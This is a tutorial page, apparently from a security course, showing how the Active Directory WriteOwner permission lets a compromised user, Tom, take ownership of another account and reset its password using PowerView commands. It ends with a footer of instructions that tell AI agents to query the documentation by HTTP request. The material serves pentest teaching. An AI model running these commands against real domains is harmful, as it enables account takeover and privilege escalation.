# WriteOwner Exploit ## What is the WriteOwner Permission For? Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). The WriteOwner permission can be abused by an attacker to change the object owner to an attacker controlled user and take over the object ## Scenario: You have managed to compromise an account belonging to Tom. Running Bloodhound identified that there were was no direct access from Tom's account to Domain Admins. Checking **Outband Object Control** reveled an attack path from Tom to the **Backup Admin** group through Claire. ![Outband Control Option](/files/-MQDP-k8e4ZU3P5mcAq5) ![Attack Path Identified](/files/-MQDP5cmEv2AbdZsvO7z) #### Attack Path 1. Tom has `WriteOwner` permissions over Claire 2. Claire has `GenericWrite` permissions over the group `BACKUP_ADMINS` 3. `BACKUP_ADMINS` sounds interesting :) In order to easily take advantage of the `WriteOwner` and `GenericWrite` permissions, we’ll use `PowerView`, which is part of the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) collection. ``` ### Set tom as the owner of claire’s ACL Set-DomainObjectOwner -identity claire -OwnerIdentity tom ### Give tom permissions to change passwords on that ACL Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword ### Create powershell credential and change credentials. ### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force Set-DomainUserPassword -identity claire -accountpassword $cred ``` ![Screenshot for reference](/files/-MQDPJ19BsoNaV7xeZWa) Success. You can now login as Claire using the new password: **qwer1234QWER!@#$** ![](/files/-MQDPR_2VHlfytI5vBWx) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zflemingg1.gitbook.io/undergrad-tutorials/active-directory-acl-abuse/writeowner-exploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.